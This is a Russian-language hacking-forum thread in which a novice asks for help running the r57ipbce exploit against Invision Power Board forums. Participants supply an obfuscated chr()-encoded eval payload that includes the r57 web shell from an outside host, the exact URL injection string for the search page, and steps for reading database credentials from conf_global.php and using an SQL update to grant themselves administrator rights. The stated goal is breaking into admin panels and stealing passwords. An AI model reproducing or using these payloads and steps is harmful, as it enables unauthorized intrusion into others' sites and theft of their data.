Где взять include для эксплоита r57ipbce?
 

Помогите плиз.
Эти строки я расшифровал (спасибо кто помог ;) )
Теперь вопрос где взять инклюд для этого эксплоита.
И еще такой вопрос:
Если я смогу выполнять команды то какими можно залесть в админку или что то типа того.

ЗЫ: Могу выложить таблицу ASCII-кодов для нубов )

скажи какую ссылку надо тебе туда закать...

Не, ты не понял. Я уже все расшифровал и зашифровать тоже могу, но мне нужен сам include, ссылка на который зашифрована. Ведь rst.void.ru закрылся и ссылка битая. А я хочу выложить этот инклюд на свои хостинг и закодировать ссылку вместо этой.

ЗЫ: У тебя случаем нету программы которая бы кодировала буквы в ASCII код? (то есть в chr(...)) А то смотреть по таблице как то не хочется :)

(с)Bug(o)r

И что это?

Это называеться исходный код программы которая бы кодировала буквы в ASCII код? (то есть в chr(...)) ... :)

Ладно забирай готовую тут:
http://rapidshare.com/files/12648382/Project1.exe.html

Ааа.... )) Спасибо! А include 'a у тебя нет?
А на чем прогу писал?
И еще : а есть программа которая наоборот бы код делала бы в ссылку?Или в этой тоже можно?

Просто ложишь на свой сайт шелл r57 (www.site.ru/r57.txt)
Потом с помощью проги перегоняешь все в ASCII код
И все, какой инклуд тебе нужен?

Include это txt на который ссылается этот эксплоит! Он находится на rst.void.ru (но сайт закрылся) => неьзя выполнить команды .
Внимание вопрос: нужен именно инклюд чтобы выполнять команды или шелл?

Оригинал этого эксплойта ссылался на http://rst.void.ru/download/r57shell.txt

шелл и есть инклуд в данном случае... о_0

google.ru keywords: r57shell

Cпс. http://sources.codenet.ru/file/829/r57shell.php это то или нет?

И теперь я должен залить его к себе на сервер (сайт) и вставить ссылку в экплоит?

я же тебе писал:

Теперь ты должен заменить ссылку на свою...

Спасибо всем! Побежал пробовать

оно самое ;)
угумс. сцылку в ascii/dec не забудь перевести)

Вставил ссылку. Теперь эксплоит не может найти сообщение
Create new message .... [done]
Serch message ... [failed]

ЗЫ: Со старой ссылкой все Ок тока команды не отправляются )

Делай так:

А что должно получится то? Мне пишет: Обнаружена ошибка. Если Вам неизвестны причины ошибки, попробуйте обратиться к разделам помощи.

шелл заинклудится

И как проверить заинклюдился шелл или нет?

как как, ты его увидешь...

Можешь пожалуйста объяснить подробнее. Вот я в строке поиска ввел что надо, нажал интер и что дальше делать? плиз ты же умный ) помоги

Заходишь на форум IPB, создаешь тему в которой пишешь код(в каиором зашифрована ссылка на шелл r57), затем в поиске ищешь r57ipbxplhohohoeval, затем в адресной строке браузера удаляешь все, что написано после searchid, и заменяешь на &search_in=posts&result_type=posts&highlite=r57ipb xplhohohoeval&lastdate=z|eval.*?%20//)%23e%00
И у тебя в браузере открываеться r57 шелл(если форум бажный)

hohoho Точно hohoho? просто с твоей прогой получается hihihi

точно, замени на hohoho

Теперь ни че не происходит. То есть я заменяю все после search_in, жму интер, окно обновляется и опять открывается поиск.

Может шелл не так залил, может хостинг фигня...
Можешь мне дать адрес твоего шелла, если он есть у тебя?

О. сколько раз на форуме перетирался этот вопрос!

1) Рабочий шелл


eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(46). chr(114). chr(99). chr(119). chr(45). chr(116). chr(101). chr(97). chr(109). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(115). chr(104). chr(101). chr(108). chr(108). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42) );//
2) тему надо создавать новую, с легким названием.
3) В поиске потом искать по названию темы и выбирать "результат ввиде сообщения"
4) В конец строки подставлять &lastdate=z|eval.*?%20//)%23e%00
5) Уязвимость старая, затертая до дыр, форум скорее всего пропатчен

Спасибо. И не скажете команды что б в админку залесть или пас украсть? А то просто не хочу все команды подряд перебирать и я не очень шарю в этом

Я поражаюсь зачем тебе админка, если есть шелл,хотя чему тут удивляться сам таким был :rolleyes: но я все таки попробую тебе объяснить один из способов как попасть в нее, если разумеется у тебя есть шелл.Для начала зарегистрируй юзера и запомни его id, далее надо выдернуть записи из файла forum/conf_global.php
$INFO['sql_database']='............;
$INFO['sql_driver']= '.............';
$INFO['sql_host']='.........';
$INFO['sql_pass']= '............';
$INFO['sql_user']='..............';
Потом в самом низу шелла есть: Выполнение SQL запроса туда вставляешь те данные которые ты вытянул из conf_global.php в сам запрос ставишь
UPDATE ibf_members SET mgroup=4 WHERE id=ид твоего юзера, и все ты админ, можешь топать в админку.

даже когда отделяешь ; // сплойт неработает почемута ссылка идет с точкой и выдает ошибку можете дать рабочий код ?

IPB WARNING [2] Unknown(): php_network_getaddresses: getaddrinfo failed: Name or service not known (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
IPB WARNING [2] Unknown(http://.rcw-team.ru/download/shell/r57shell.txt): failed to open stream: Address family not supported by protocol (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
IPB WARNING [2] Unknown(): php_network_getaddresses: getaddrinfo failed: Name or service not known (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
IPB WARNING [2] Unknown(http://.rcw-team.ru/download/shell/r57shell.txt): failed to open stream: Address family not supported by protocol (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
IPB WARNING [2] (null)(): Failed opening 'http://.rcw-team.ru/download/shell/r57shell.txt' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)

вот что я получаю